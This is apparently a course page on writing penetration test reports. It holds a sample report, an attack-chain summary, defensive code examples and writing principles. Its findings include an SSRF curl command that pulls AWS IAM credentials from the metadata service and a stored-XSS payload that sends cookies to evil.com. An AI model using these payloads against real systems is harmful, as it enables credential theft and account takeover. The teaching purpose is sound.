# Advanced Pentest Report
## 🔥 Vibe Prompt
"Write a professional pentest report: executive summary, risk assessment, findings, recommendations."
## Report Template
# Penetration Test Report: Target Application
## 1. Executive Summary
XYZ Corp engaged us to pentest their e-commerce platform.
Scope: web app, mobile API, infrastructure (10 IPs)
Duration: 2 weeks (May 1-14, 2024)
Team: 2 senior pentesters
### Key Findings
- Total vulnerabilities: 12 (3 Critical, 4 High, 3 Medium, 2 Low)
- Attack chain achieved: Unauthenticated RCE via SSRF → Cloud metadata → IAM keys
- CVSS average: 7.8/10
### Risk Rating
| Severity | Count |
|----------|-------|
| Critical | 3 |
| High | 4 |
| Medium | 3 |
| Low | 2 |
## 2. Scope
- Web Application: https://shop.example.com
- Mobile API: https://api.example.com/v2
- Infrastructure: 10.0.0.0/24
- Source Code: GitHub repo (static analysis only)
## 3. Methodology
- Recon: passive (OSINT) + active (scanning)
- Automated: Nessus, Burp Suite Pro, Acunetix
- Manual: Business logic, auth, IDOR, race conditions
- Mobile: Frida, Objection, APKTool
## 4. Findings Detail
### CRITICAL: SSRF to Cloud Metadata (CVSS 9.1)
**Location:** /api/fetch?url=
**Description:** The fetch endpoint does not validate the supplied URL, so an attacker can make the server request the AWS instance metadata service on their behalf and read the credentials it returns.
**Reproduction:**
```bash
curl "https://shop.example.com/api/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"
```
**Impact:** Full AWS credential compromise → data breach
**Recommendation:**
- Block private IP ranges (169.254.0.0/16, 10.0.0.0/8, 172.16.0.0/12)
- Use an allowlist of approved URLs
- Remove the feature or restrict to specific domains
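The three recommendations above, implemented as one URL check for a server-side fetch feature. This is an added example, not code from the report or the tested application; the function names, the allowlist contents and the injectable `resolver` hook are assumptions. It rejects non-HTTP schemes and embedded credentials, requires the host to be on an allowlist, resolves every A/AAAA record and refuses any address that is not globally routable (which covers 10/8, 172.16/12, 192.168/16, 169.254/16 for the metadata service, loopback, and IPv4-mapped IPv6 forms such as `::ffff:169.254.169.254`).

```python
"""Added example (not from the report or the target application): validate a
user-supplied URL before a server-side fetch. Names and the allowlist are
assumptions; the resolver is injectable so the check can run without DNS."""
import ipaddress
import socket
from urllib.parse import urlparse

# Constructed allowlist of hosts the fetch feature may reach (assumption).
ALLOWED_HOSTS = {"cdn.example.com", "partner-api.example.com"}
ALLOWED_SCHEMES = {"http", "https"}


def is_public_ip(ip_str: str) -> bool:
    """True only for globally routable unicast addresses. Private, link-local
    (169.254/16, i.e. cloud metadata), loopback and reserved ranges fail, and
    an IPv4-mapped IPv6 address is unwrapped first so ::ffff:10.0.0.5 fails too."""
    ip = ipaddress.ip_address(ip_str)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global and not ip.is_multicast


def default_resolver(hostname: str) -> list:
    """Resolve all A/AAAA records so every candidate address gets checked."""
    infos = socket.getaddrinfo(hostname, None)
    return sorted({info[4][0] for info in infos})


def validate_fetch_url(url: str, resolver=default_resolver) -> tuple:
    """Return (ok, reason). Callers should pass the resolved address on to the
    HTTP client (pin it) so a second lookup cannot be rebound after this check."""
    parsed = urlparse(url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parsed.scheme!r}"
    if parsed.username or parsed.password:
        return False, "credentials in URL not allowed"
    host = parsed.hostname
    if not host:
        return False, "missing hostname"
    if host.lower() not in ALLOWED_HOSTS:
        return False, f"host not in allowlist: {host!r}"
    try:
        addresses = resolver(host)
    except OSError as exc:
        return False, f"resolution failed: {exc}"
    if not addresses:
        return False, "host resolved to no addresses"
    for addr in addresses:
        if not is_public_ip(addr):
            return False, f"host resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed resolver results so the demo runs offline.
    fake_dns = {"cdn.example.com": ["93.184.216.34"],
                "partner-api.example.com": ["2606:4700::1111", "::ffff:10.0.0.5"]}
    for candidate in ("https://cdn.example.com/img.png",
                      "http://169.254.169.254/latest/meta-data/",
                      "https://partner-api.example.com/v1"):
        print(candidate, validate_fetch_url(candidate, fake_dns.__getitem__))
```

The allowlist check comes before resolution on purpose: an IP literal such as `169.254.169.254` is rejected as "not in allowlist" without ever touching DNS, and a permitted hostname that happens to resolve to an internal address (a partner record pointing at a private range, or a rebinding attempt) is still refused by the address check.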
### HIGH: Stored XSS (CVSS 6.8)
**Location:** User profile name field
**Description:** The name field is stored and later rendered without sanitization or output encoding, so a script placed in it executes for every user who views the profile (stored XSS).
**Reproduction:**
```http
POST /api/profile
{"name": "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"}
```
**Impact:** Session hijacking, admin account takeover
**Recommendation:**
- Sanitize all user input (bleach, DOMPurify)
- Implement Content-Security-Policy
- Use HttpOnly cookies
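To make the three recommendations concrete, here is the vulnerable rendering pattern next to a hardened version. This is an added example, not code from the report or the tested application; the function names, the CSP directives and the cookie attributes are assumptions about a typical Python web backend, and the payload is a constructed stand-in rather than the report's reproduction string.

```python
"""Added example (not from the report): the 'before' rendering that yields
stored XSS, and the 'after' that encodes on output, sends a nonce-based
Content-Security-Policy, and marks the session cookie HttpOnly."""
import html
import secrets

# Constructed payload in the shape of the finding (assumption, not the report's).
SAMPLE_NAME = "<script>alert(1)</script>"


def render_profile_vulnerable(name: str) -> str:
    """'Before': the stored name is concatenated straight into HTML."""
    return f"<h1>Welcome, {name}</h1>"


def render_profile_hardened(name: str) -> str:
    """'After': encode for the HTML text context at output time. Encoding on
    output (not only sanitizing on input) protects every render path, including
    data that was stored before the fix."""
    return f"<h1>Welcome, {html.escape(name, quote=True)}</h1>"


def new_nonce() -> str:
    """Per-response nonce for the CSP; the same value goes on legitimate <script> tags."""
    return secrets.token_urlsafe(16)


def security_headers(nonce: str) -> dict:
    """Defence in depth: with a nonce-based CSP an injected inline <script>
    still does not run even if encoding is missed somewhere."""
    return {
        "Content-Security-Policy": (
            f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'none'; frame-ancestors 'none'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


def session_cookie(session_id: str) -> str:
    """Set-Cookie value: HttpOnly keeps the session id out of document.cookie,
    so even a successful script injection cannot exfiltrate it."""
    return f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


def contains_live_script(html_doc: str) -> bool:
    """Naive check used to compare the two renderers."""
    return "<script" in html_doc.lower()


if __name__ == "__main__":
    print("vulnerable:", render_profile_vulnerable(SAMPLE_NAME))
    print("hardened:  ", render_profile_hardened(SAMPLE_NAME))
    nonce = new_nonce()
    print(security_headers(nonce))
    print(session_cookie(secrets.token_urlsafe(24)))
```

The ordering of defences matters: output encoding removes the bug, CSP limits the blast radius of any encoding you missed, and HttpOnly removes the session cookie as a prize. None of the three replaces the others.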
## 5. Attack Chain Walkthrough
1. [Recon] Found fetch API endpoint via JS analysis
2. [SSRF] Accessed AWS metadata → retrieved IAM credentials
3. [Cloud] Used IAM keys to list S3 buckets → customer data exposed
4. [Auth] Weak JWT secret → forged admin token
5. [Impact] Full admin access to customer DB
Total time: 4 hours (automated + manual)
## 6. Risk Matrix
| Impact \ Likelihood | Low | Med | High |
|---------------------|-----|-----|------|
| Critical | 0 | 1 | 2 |
| High | 1 | 2 | 1 |
| Medium | 2 | 1 | 0 |
| Low | 2 | 0 | 0 |
## 7. Recommendations by Priority
**P0 (Immediate):**
- Fix SSRF (block private IPs)
- Rotate all IAM keys
- Implement WAF (Cloudflare)
**P1 (This sprint):**
- Sanitize all user inputs (XSS)
- Change JWT secret to 256-bit random
- Rate limit login endpoint
**P2 (Next sprint):**
- Implement CSP headers
- Add security headers (HSTS, X-Frame-Options)
- Move secrets to AWS Secrets Manager
**P3 (Backlog):**
- Regular dependency scanning
- Bug bounty program
- Security training for developers
## 8. Tools Used
| Tool | Purpose |
|------|---------|
| Burp Suite Pro | Web proxy, scanner |
| Nmap | Network scanning |
| Gobuster | Directory brute force |
| Frida | Mobile runtime |
| Nessus | Vulnerability scanning |
| Metasploit | Exploitation |
| Custom Python scripts | Business logic testing |
## PenTesting Advanced Course Complete! 🎉
- ✅ Recon & OSINT
- ✅ Exploit Development
- ✅ Web Exploitation
- ✅ Mobile & API
- ✅ Report Writing
## Report Writing Principles
| Principle | Why |
|-----------|-----|
| Executive summary first | Non-technical audience |
| Reproduce steps clearly | Developer can verify |
| Business impact | Prioritization |
| Fix recommendations | Actionable |
| Attack chain demo | Shows real risk |
| Risk matrix | Visual priority |
## Best Practices
- Show attack chain (not just isolated bugs)
- Provide clear reproduction steps (curl commands)
- Map findings to OWASP Top 10 / CWE
- Give CVSS score for each finding
- Separate technical vs executive sections
- Include positive findings (things done right)
- Follow up after retest
---
## Penetration Test Reports: From Finding Vulnerabilities to Driving Remediation
A vulnerability that is not documented might as well not exist. The penetration test report is the final deliverable of your work; it determines whether your findings are taken seriously and whether they get fixed.
### The Structure of a Professional Report
- Executive Summary
  - For management: risk overview, business impact, statistics
- Technical Details
  - For engineers: vulnerability reproduction steps, PoC code
- Risk Rating
  - CVSS score + scope of impact + exploitation difficulty
- Remediation
  - Concrete fix steps, reference resources
- Appendix
  - Scanner reports, list of tools used
### Vulnerability Risk Levels
| Level | CVSS Score | Description | Fix Deadline |
|:------|:-----------|:------------|:-------------|
| **Critical** | 9.0-10.0 | Direct takeover of the server is possible | 24 hours |
| **High** | 7.0-8.9 | Sensitive data can be read | 7 days |
| **Medium** | 4.0-6.9 | Information disclosure or limited impact | 30 days |
| **Low** | 0.1-3.9 | Information gathering or theoretical risk | 90 days |
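The bands and deadlines in this table, and the "Risk Rating" count table and CVSS average from the executive summary of the template above, can all be derived mechanically from a findings list. The helper below is an added example, not part of the course material; the function names are assumptions, the findings are constructed sample data, and the "None" label for a score of 0.0 is taken from the CVSS v3 rating scale, which the table does not list.

```python
"""Added example (not part of the course page): derive severity and fix
deadline from a CVSS score using the bands in the table above, then build the
severity-count table, CVSS average and remediation schedule for a report."""
from collections import Counter
from datetime import date, timedelta

# (lower bound, upper bound, level, deadline in days) copied from the table.
SEVERITY_BANDS = [
    (9.0, 10.0, "Critical", 1),
    (7.0, 8.9, "High", 7),
    (4.0, 6.9, "Medium", 30),
    (0.1, 3.9, "Low", 90),
]


def severity_for(cvss: float) -> tuple:
    """Map a CVSS base score to (level, deadline_days). The score is rounded
    to one decimal first so a value such as 6.93 does not fall between bands."""
    score = round(cvss, 1)
    if not 0.0 <= score <= 10.0:
        raise ValueError(f"CVSS out of range: {cvss}")
    for low, high, level, days in SEVERITY_BANDS:
        if low <= score <= high:
            return level, days
    return "None", 0  # 0.0: CVSS v3 "None" rating, no deadline (assumption)


def due_date(report_date: date, cvss: float) -> date:
    """Remediation due date counted from the report delivery date."""
    _, days = severity_for(cvss)
    return report_date + timedelta(days=days)


def summarize(findings: list, report_date: date) -> dict:
    """Counts per level (all four levels always present, in table order), the
    average CVSS rounded to one decimal, and a due-date schedule, highest score first."""
    counts = Counter(severity_for(f["cvss"])[0] for f in findings)
    table = {level: counts.get(level, 0) for _, _, level, _ in SEVERITY_BANDS}
    avg = round(sum(f["cvss"] for f in findings) / len(findings), 1) if findings else 0.0
    schedule = [
        {"title": f["title"],
         "level": severity_for(f["cvss"])[0],
         "due": due_date(report_date, f["cvss"]).isoformat()}
        for f in sorted(findings, key=lambda f: -f["cvss"])
    ]
    return {"counts": table, "average_cvss": avg, "schedule": schedule}


# Constructed sample findings, not the report's real data.
SAMPLE_FINDINGS = [
    {"title": "SSRF to cloud metadata", "cvss": 9.1},
    {"title": "Weak JWT secret", "cvss": 7.5},
    {"title": "Stored XSS in profile", "cvss": 5.3},
    {"title": "Missing HSTS header", "cvss": 3.3},
]


if __name__ == "__main__":
    summary = summarize(SAMPLE_FINDINGS, date(2024, 5, 14))
    print("| Severity | Count |")
    print("|----------|-------|")
    for level, count in summary["counts"].items():
        print(f"| {level} | {count} |")
    print("CVSS average:", summary["average_cvss"])
    for row in summary["schedule"]:
        print(f"{row['due']}  {row['level']:<8} {row['title']}")
```

Deriving the level from the score rather than assigning it by hand keeps the findings section, the count table and the risk matrix consistent with each other; a finding whose prose rating disagrees with its CVSS score is one of the first things a reviewer will question.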
### Course Summary
In this advanced penetration testing course you learned exploit development, web vulnerabilities, mobile and API testing, and professional report writing. You now have the skills to carry out a complete penetration test: the full process from finding vulnerabilities to driving remediation.